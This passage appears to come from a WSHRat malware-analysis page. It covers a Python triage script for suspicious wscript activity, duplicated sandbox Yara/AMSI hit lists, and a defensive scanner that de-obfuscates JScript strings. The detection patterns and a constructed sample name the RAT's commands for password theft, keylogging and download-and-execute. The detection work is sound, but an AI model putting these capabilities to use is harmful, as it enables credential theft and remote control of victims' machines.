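DOUBLE_EXT = re.compile(r"\.(pdf|docx?|xlsx?|pptx?|jpe?g|png|txt)\.(js|jse|vbs|vbe|wsf)$", re.I)
USER_WRITABLE = re.compile(
    r"\\(AppData\\Roaming|AppData\\Local\\Temp|Downloads|Start Menu\\Programs\\Startup)\\", re.I)
BATCH_MODE = re.compile(r"(?:^|\s)//B(?:\s|$)", re.I)
STANDARD_WEB_PORTS = {80, 443, 8080, 8443}


def _is_script_host(image):
    return image.lower().endswith(SCRIPT_HOSTS)


def script_argument(cmdline):
    """Return the first quoted or bare token that looks like a WSH script path."""
    for m in re.finditer(r'"([^"]+)"|(\S+)', cmdline):
        token = m.group(1) or m.group(2)
        if token.lower().endswith(SCRIPT_EXT):
            return token
    return None


def check_process(ev):
    hits = []
    if not _is_script_host(ev["image"]):
        return hits
    script = script_argument(ev["cmdline"])
    if script is None:
        return hits
    if BATCH_MODE.search(ev["cmdline"]):
        hits.append("batch mode (//B) suppresses script error dialogs")
    if DOUBLE_EXT.search(script):
        hits.append("double extension disguises the script as a document")
    if USER_WRITABLE.search(script):
        hits.append("script runs from a user-writable or startup location")
    if _is_script_host(ev.get("parent_image", "")):
        hits.append("script host spawned by a script host (dropper chain)")
    return hits


def check_network(ev):
    hits = []
    if not _is_script_host(ev["image"]):
        return hits
    if ip_address(ev["dst_ip"]).is_global:
        hits.append("script host connected to a non-local address")
        if ev["dst_port"] not in STANDARD_WEB_PORTS:
            hits.append(f"non-standard destination port {ev['dst_port']}")
    return hits


def triage(events):
    """Return [(event, [reasons])] for every event that trips at least one rule."""
    findings = []
    for ev in events:
        hits = check_process(ev) if ev["type"] == "process" else check_network(ev)
        if hits:
            findings.append((ev, hits))
    return findings


if __name__ == "__main__":
    for ev, reasons in triage(SAMPLE_EVENTS):
        print(ev.get("cmdline") or f'{ev["dst_ip"]}:{ev["dst_port"]}')
        for r in reasons:
            print("  -", r)
```

Run on the sample events, only the two report command lines and the two C2 connections produce findings; the logon script from a share and the internal HTTPS connection stay silent. The individual rules are weak on their own (administrators do run wscript //B), so score by the number of reasons per event rather than alerting on any single one.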

Stealing of Sensitive Information

Source: Yara match File source: amsi64_2316.amsi.csv, type: OTHER
Source: Yara match File source: amsi64_3084.amsi.csv, type: OTHER
Source: Yara match File source: amsi64_5428.amsi.csv, type: OTHER
Source: Yara match File source: amsi64_5228.amsi.csv, type: OTHER
Source: Yara match File source: amsi64_6540.amsi.csv, type: OTHER
Source: Yara match File source: amsi64_4108.amsi.csv, type: OTHER
Source: Yara match File source: amsi64_3168.amsi.csv, type: OTHER
Source: Yara match File source: amsi64_3052.amsi.csv, type: OTHER
Source: Yara match File source: amsi64_2108.amsi.csv, type: OTHER
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 00000000.00000003.1717094086.00000204EDD11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2052217166.000001B0667E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1732635440.00000204E96D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1895477782.0000020BE1A81000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2075840679.00000221C10A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1732046092.00000204E96D3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2044832701.000001B066B5B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.1946740186.00000221C1074000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.1948124676.00000221C10C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1756338470.0000020BE1DFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1716943117.00000204EE000000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.1939972889.00000221C11A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1895073011.0000020BE1D16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1894450811.0000020BE1EEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1717820374.00000204ED0E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1733013257.00000204E96D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1961308985.0000020BE1EEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1894678392.0000020BE1D09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1707066216.00000204EDF11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1734499646.00000204E96DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2051877056.000001B066C4A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.1939694643.00000221C0FD1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2074574369.00000221C10A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2053586111.000001B065B93000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1716028940.00000204EE000000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2051515691.000001B066DEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1733327075.00000204E96DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1734834487.00000204E96DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2052217166.000001B066887000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1894927688.0000020BE1D09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1707419041.00000204EDF11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1899732633.0000020BE1EEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1716743000.00000204EE31A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1707269284.00000204EE0E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wscript.exe PID: 4108, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 3168, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 3052, type: MEMORYSTR

Remote Access Functionality

Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: Suspicious string up-n-exec
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: Suspicious string get-pass
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: Suspicious string down-n-exec
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: Suspicious string keylogger
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: Suspicious string take-log
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: Suspicious string up-n-exec
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: Suspicious string get-pass
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: Suspicious string down-n-exec
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: Suspicious string keylogger
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: Suspicious string take-log
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: Suspicious string up-n-exec
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: Suspicious string get-pass
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: Suspicious string down-n-exec
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: Suspicious string keylogger
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: Suspicious string take-log
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: Suspicious string up-n-exec
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: Suspicious string get-pass
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: Suspicious string down-n-exec
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: Suspicious string keylogger
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: Suspicious string take-log
Source: Yara match File source: amsi64_2316.amsi.csv, type: OTHER
Source: Yara match File source: amsi64_3084.amsi.csv, type: OTHER
Source: Yara match File source: amsi64_5428.amsi.csv, type: OTHER
Source: Yara match File source: amsi64_5228.amsi.csv, type: OTHER
Source: Yara match File source: amsi64_6540.amsi.csv, type: OTHER
Source: Yara match File source: amsi64_4108.amsi.csv, type: OTHER
Source: Yara match File source: amsi64_3168.amsi.csv, type: OTHER
Source: Yara match File source: amsi64_3052.amsi.csv, type: OTHER
Source: Yara match File source: amsi64_2108.amsi.csv, type: OTHER
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 00000000.00000003.1717094086.00000204EDD11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2052217166.000001B0667E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1732635440.00000204E96D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1895477782.0000020BE1A81000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2075840679.00000221C10A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1732046092.00000204E96D3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2044832701.000001B066B5B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.1946740186.00000221C1074000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.1948124676.00000221C10C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1756338470.0000020BE1DFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1716943117.00000204EE000000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.1939972889.00000221C11A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1895073011.0000020BE1D16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1894450811.0000020BE1EEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1717820374.00000204ED0E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1733013257.00000204E96D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1961308985.0000020BE1EEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1894678392.0000020BE1D09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1707066216.00000204EDF11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1734499646.00000204E96DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2051877056.000001B066C4A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.1939694643.00000221C0FD1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2074574369.00000221C10A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2053586111.000001B065B93000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1716028940.00000204EE000000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2051515691.000001B066DEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1733327075.00000204E96DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1734834487.00000204E96DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2052217166.000001B066887000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1894927688.0000020BE1D09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1707419041.00000204EDF11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1899732633.0000020BE1EEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1716743000.00000204EE31A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1707269284.00000204EE0E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wscript.exe PID: 4108, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 3168, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 3052, type: MEMORYSTR
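The Anti Malware Scan Interface entries above list the WSHRat command vocabulary (up-n-exec, get-pass, down-n-exec, keylogger, take-log). AMSI receives the script text after the script engine has evaluated it, which is why these names surface at run time even though the on-disk file is obfuscated. The following is an added example, not code from the report or the sample: a scanner that folds two common JScript string-splitting tricks before matching the command names, so that a static scan approximates what AMSI sees. The script body is constructed for illustration and the concatenation and String.fromCharCode handling is a generic assumption; the page does not show how this sample obfuscates its strings.

```python
"""Added example, not code from the report or the sample.

Scanner for the WSHRat command vocabulary that the report's AMSI entries list.
AMSI receives script text after the engine has assembled split strings, so the
scanner folds two generic JScript string-splitting tricks before matching. The
script body below is constructed for illustration; the page does not show how
this sample obfuscates its strings.
"""
import re

# Command names taken from the report's "Suspicious string" AMSI entries.
WSHRAT_COMMANDS = ("up-n-exec", "down-n-exec", "get-pass", "keylogger", "take-log")

# Constructed sample using assumed obfuscation styles, not this sample's real code.
SAMPLE_SCRIPT = r'''
var a = "up-" + "n-" + "exec";
var b = String.fromCharCode(100,111,119,110,45,110,45,101,120,101,99);
var c = 'key' + 'logger';
if (cmd == "get-pass") { sendPasswords(); }
'''

# "x" + "y": two adjacent string literals joined by +, each with its own quote style
CONCAT = re.compile(r'''(["'])((?:(?!\1).)*)\1\s*\+\s*(["'])((?:(?!\3).)*)\3''')
FROMCHARCODE = re.compile(r"String\.fromCharCode\(\s*([\d\s,]+)\)")


def fold_strings(src):
    """Rewrite String.fromCharCode(...) calls and "a" + "b" chains as literals."""
    def _charcode(m):
        codes = [int(n) for n in m.group(1).split(",") if n.strip()]
        return '"' + "".join(chr(n) for n in codes) + '"'
    src = FROMCHARCODE.sub(_charcode, src)
    prev = None
    while prev != src:  # repeat until no adjacent literal pairs remain
        prev = src
        src = CONCAT.sub(lambda m: '"' + m.group(2) + m.group(4) + '"', src)
    return src


def find_commands(src):
    """Return the sorted WSHRat command names present after string folding."""
    folded = fold_strings(src).lower()
    return sorted(c for c in WSHRAT_COMMANDS if c in folded)


if __name__ == "__main__":
    raw = sorted(c for c in WSHRAT_COMMANDS if c in SAMPLE_SCRIPT.lower())
    print("raw scan:   ", raw)
    print("folded scan:", find_commands(SAMPLE_SCRIPT))
```

On the constructed script a plain substring scan of the file finds only get-pass; after folding, up-n-exec, down-n-exec and keylogger appear as well. This is a static approximation only: real droppers also build strings through arrays, eval and custom decoders, which is why the AMSI and memory-based Yara hits in the report are the more reliable signal.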